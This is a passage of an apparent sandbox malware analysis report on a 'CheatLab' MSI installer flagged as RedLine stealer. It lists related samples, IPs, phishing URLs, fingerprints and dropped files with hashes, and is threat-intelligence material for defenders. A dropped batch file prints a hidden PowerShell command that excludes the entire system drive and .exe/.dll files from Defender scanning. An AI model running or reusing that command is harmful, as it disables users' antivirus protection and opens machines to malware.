                                                                                                                                                                                              Uykndrdm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.134.233
                                                                                                                                                                                              Porland_Sipari#U015f_Listesi_03.11.2023.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • 162.159.133.233
                                                                                                                                                                                              Uykndrdm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.133.233
                                                                                                                                                                                              zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.135.233
                                                                                                                                                                                              Ithojli.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.130.233
                                                                                                                                                                                              zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.130.233
                                                                                                                                                                                              231005-001-ba.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Ithojli.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.134.233
                                                                                                                                                                                              REVISED_DOCUMENTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              231005-001-ba.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.133.233
                                                                                                                                                                                              DEKONT_00011123_5600966797pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              ip-api.comCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              https://applogyx.com//caltitle.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                              10.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              https://r20.rs6.net/tn.jsp?f=001NdUjQbShLjPEoJXEPe4uscikF9DeiuI06G1LhWRNRKyrYyqo6TLcAL3c_R4vTPh0pysY7ICud6VKtpI4V3Ww3ApCnLchitmzq64UCE0JU3OfEqTzdIWlaslcKlffQZuAhZZNJ50aAOaEUpJRTRptcw==&c=&ch=&__=kmeyer@osugiving.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                              https://netfl1x.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                              Product_lists_.xlam.xlsxGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              bQXD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                                                                              • 208.95.112.1

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              CLOUDFLARENETUSCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.134.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.133.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.130.233
                                                                                                                                                                                              N04MI8kf8z.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                              • 172.64.145.151
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                              uuX52kMNkj.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                              • 172.64.145.151
                                                                                                                                                                                              qIHAPj4nzL.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                              • 172.64.145.151
                                                                                                                                                                                              https://minisplitdaikin.com/www/online-access/Security_on_your_card_account.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.24.14
                                                                                                                                                                                              3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exeGet hashmaliciousAmadey, Healer AV Disabler, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                              • 172.64.145.151
                                                                                                                                                                                              pbl0DZaV58.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                              • 172.65.108.235
                                                                                                                                                                                              Z5ZWH2EXy5.exeGet hashmaliciousLummaC Stealer, zgRATBrowse
                                                                                                                                                                                              • 104.21.1.195
                                                                                                                                                                                              https://netflixorg25.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.161.164
                                                                                                                                                                                              ACZXEgb7HY.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                              • 172.68.149.154
                                                                                                                                                                                              https://uc-login-netflix.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 141.101.120.11
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.133.233
                                                                                                                                                                                              https://netflix-hacked-mode-free-download.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.161.164
                                                                                                                                                                                              https://pub-76f246b496a948758e6529f0f14f48da.r2.dev/eumailDSE_na3MXkADMzoauthNm8LdKhC9.html?Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              https://coin30.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.151.55
                                                                                                                                                                                              https://r20.rs6.net/tn.jsp?f=001znx00lEHOfFY5xeNI8b7OkVJVsyIUpKMjuD4Gwp_wWpkho1gePaV0CcBSOZixYEj3XpwyIArh43pg8x1-foWdjA9uduBp8LZ0pMtN1cMRyJgfGB0bkaBaR09G4_o-rbFHPsU62DUv2qld76Jyex1iIOfF0g0jIvaTOLcmJiEHAs=&c=&ch=&__=/qwer/sADpK/am9hbmh1dHNvbkB1c21ldHJvYmFuay5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.2.184
                                                                                                                                                                                              HWl7Kb2oh2.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                              • 172.64.145.151
                                                                                                                                                                                              TUT-ASUSCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              https://applogyx.com//caltitle.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                              10.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              https://r20.rs6.net/tn.jsp?f=001NdUjQbShLjPEoJXEPe4uscikF9DeiuI06G1LhWRNRKyrYyqo6TLcAL3c_R4vTPh0pysY7ICud6VKtpI4V3Ww3ApCnLchitmzq64UCE0JU3OfEqTzdIWlaslcKlffQZuAhZZNJ50aAOaEUpJRTRptcw==&c=&ch=&__=kmeyer@osugiving.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                              https://netfl1x.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                              bQXD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                              https://involved.cfd/eeewee/haseee/lx/dlg1yl/bmlra2lAYXN0cmFuaXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 208.95.112.2

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              SecuriteInfo.com.Trojan.NSIS.Guloader.26526.15163.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Attachment-3_RFQ10004#U00b7pdf.vbeGet hashmaliciousNanocore, GuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              CO.ADVERTENCIAM1.ja.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              yl620v88J8.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              yVvaKVQhUq.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              d83CR44HKh.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              SHbn0i2A6T.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              I2nzRiZnRy.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              tk2UDalKl5.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              564923591_2023-10-02-08.49.23.010743.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              TELLIMUS_(LEPINGU_L#U00c4BIVAATAMINE)-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Lampadephoria.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Slgtsforskning186.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              UPS-49A829NDJWT#U00b7pdf.vbsGet hashmaliciousNanocore, GuLoaderBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              #Uc8fc#Uc18c#Ubcc0#Uacbd#Uc694#Uccad#Uc11c#U00b7pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                              • 162.159.129.233

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSI8FE.tmpCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                    Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                      Cheat.Lab.2.7.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                          http://telegramos.org/downloadGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                winrar-611br.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  Firefox-x64.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    AnyDeskAPP.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      6p2LSuB1em.msiGet hashmaliciousEICARBrowse
                                                                                                                                                                                                                        AnyDesk.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          MERC_PG_MDLS.msiGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\Config.Msi\6cf1b6.rbs

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):193727
                                                                                                                                                                                                                            Entropy (8bit):6.41744828351229
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:8M6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiU:8BKwXYBWHRuEFW9RzLLhrUmdHDZ19Mht
                                                                                                                                                                                                                            MD5:5177CA1048901EA0AB10DDB0194A2BD0
                                                                                                                                                                                                                            SHA1:899DED44C454FD282F54C9886A4F00D0A99AD8CE
                                                                                                                                                                                                                            SHA-256:AA1C547EEB6E991843702ED989DC0E60B9A525387807086B994A4B1FE1E5CDF3
                                                                                                                                                                                                                            SHA-512:D39274420C458022B796BC83E7B63C0F90ECF5E40A1A71635249BD09C564A02302D460BE47486A20D2C8B61B7DC9D09BFB67EA9E243A7AD51D1A8F207AF73134
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...@IXOS.@.....@f.dW.@.....@.....@.....@.....@.....@......&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}..CheatLab 2.7.1..Cheat.Lab.2.7.1.msi.@.....@.....@.....@........&.{17BFB2C4-7970-46E7-9C69-EB98D896BBF9}.....@.....@.....@.....@.......@.....@.....@.......@......CheatLab 2.7.1......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{7285EAEC-8503-4760-A351-B9914BE2072E}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{782A455A-F17F-4F83-B43B-519E5CD02E50}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{C63D9F59-1705-40C1-B07A-EB81FFC1E687}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{1C2DE547-5DF6-4AF7-9AB2-B1A94C1961C8}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]L...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in D

                                                                                                                                                                                                                            C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):129927
                                                                                                                                                                                                                            Entropy (8bit):6.053213381620977
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:dCU9tteOLNPovJDbZyGRKwgu9ZdregF3yDqLS0Fa/csLWDJTETa+S3:lBwKwguUgUsS0FccUW1Tca+S3
                                                                                                                                                                                                                            MD5:CEDDECD1649237697C1211B3F9B54EED
                                                                                                                                                                                                                            SHA1:4060C06B908CC5B4ED9BD52DBE34685110205BA9
                                                                                                                                                                                                                            SHA-256:FAAE54EF7B6D95D51170AF65A46516C95A9D0FBD280350542343E6501CF349B7
                                                                                                                                                                                                                            SHA-512:7EC3EFE12EEE64266233A49E701DE7A203C92E346FB657F8E0188F43110B748C2CE13EE49951A16C27DCF16C2718F21A14F55FBEC0B8F677E68CDBBD90052AA1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.LJ..........-.......8...L.......G.......-...-...4...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........'.......-...-...4...-...-...D...........$.......-.......B...3...2...L........0.......-...........-...-...)...<...-...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L........7.......-...-...4...>...>...>...>...-...-...D...........$.......-.......B...3...2

                                                                                                                                                                                                                            C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1159194
                                                                                                                                                                                                                            Entropy (8bit):6.05592639405386
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                                                                                                                                                                                            MD5:95B55371B50778590D2468C3B9D3EEAE
                                                                                                                                                                                                                            SHA1:81791905D26279CE461C755C49D4F1B7AF177EF6
                                                                                                                                                                                                                            SHA-256:107108F03E55F93955AF07A3548C869F44FE714C54A8CF3F1A654994C6035B48
                                                                                                                                                                                                                            SHA-512:165B6845E268FF585E6A3C698BC79F02F4AA5328086716D89EF6ADE3A52BCEF7D4DA96AE8F4AD7A95DD740BC3E1DC2DD24192FA7F1A95CC4793CE341B2D7CFCC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):128
                                                                                                                                                                                                                            Entropy (8bit):4.7202350646624245
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:VSJJFIf9IMwEIF2VCceGAFddGeWLCX3AYGeWLERySn/n:s81xB1eGgdEY3AYGWRy0n
                                                                                                                                                                                                                            MD5:89DB4CB88ED70579D72B500340691359
                                                                                                                                                                                                                            SHA1:5A434F58080EEDFC78B0BA0A49710C6F3EFC5254
                                                                                                                                                                                                                            SHA-256:72B2FAA3B9D4FB7CD3E007CF5DFB00D03893B26A6161D6ADE8D003F3D669C57E
                                                                                                                                                                                                                            SHA-512:6E47F9F9DB0FCF42489567AD5DA1F1A031FC7423EE2DC79F94CDC3FF249FE18D1E8835D1A26655F4FE5BF58E8525EDBD227B12ED15EFFDDFF51642D57DB1E0BB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"

                                                                                                                                                                                                                            C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):129927
                                                                                                                                                                                                                            Entropy (8bit):6.053213381620977
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:dCU9tteOLNPovJDbZyGRKwgu9ZdregF3yDqLS0Fa/csLWDJTETa+S3:lBwKwguUgUsS0FccUW1Tca+S3
                                                                                                                                                                                                                            MD5:CEDDECD1649237697C1211B3F9B54EED
                                                                                                                                                                                                                            SHA1:4060C06B908CC5B4ED9BD52DBE34685110205BA9
                                                                                                                                                                                                                            SHA-256:FAAE54EF7B6D95D51170AF65A46516C95A9D0FBD280350542343E6501CF349B7
                                                                                                                                                                                                                            SHA-512:7EC3EFE12EEE64266233A49E701DE7A203C92E346FB657F8E0188F43110B748C2CE13EE49951A16C27DCF16C2718F21A14F55FBEC0B8F677E68CDBBD90052AA1
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:.LJ..........-.......8...L.......G.......-...-...4...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........'.......-...-...4...-...-...D...........$.......-.......B...3...2...L........0.......-...........-...-...)...<...-...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L........7.......-...-...4...>...>...>...>...-...-...D...........$.......-.......B...3...2

                                                                                                                                                                                                                            C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1159194
                                                                                                                                                                                                                            Entropy (8bit):6.05592639405386
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                                                                                                                                                                                            MD5:95B55371B50778590D2468C3B9D3EEAE
                                                                                                                                                                                                                            SHA1:81791905D26279CE461C755C49D4F1B7AF177EF6
                                                                                                                                                                                                                            SHA-256:107108F03E55F93955AF07A3548C869F44FE714C54A8CF3F1A654994C6035B48
                                                                                                                                                                                                                            SHA-512:165B6845E268FF585E6A3C698BC79F02F4AA5328086716D89EF6ADE3A52BCEF7D4DA96AE8F4AD7A95DD740BC3E1DC2DD24192FA7F1A95CC4793CE341B2D7CFCC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2633
                                                                                                                                                                                                                            Entropy (8bit):5.326570006890401
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HDfHK7HKhBHKdHK8THQmHKtXoDHsLH5HZO:Pq5qHwCYqh3oPtI6eqzxTq7qLqdqojqk
                                                                                                                                                                                                                            MD5:AE200387C3AB3E7A5A0A36D645BC68A4
                                                                                                                                                                                                                            SHA1:505611BC937B19B11967E9C4D6A51C65C8EA88B6
                                                                                                                                                                                                                            SHA-256:F75BA00D8914948BEAC91C96DE2927CA70D88CF0CC1DC9556CC35928AD84FB12
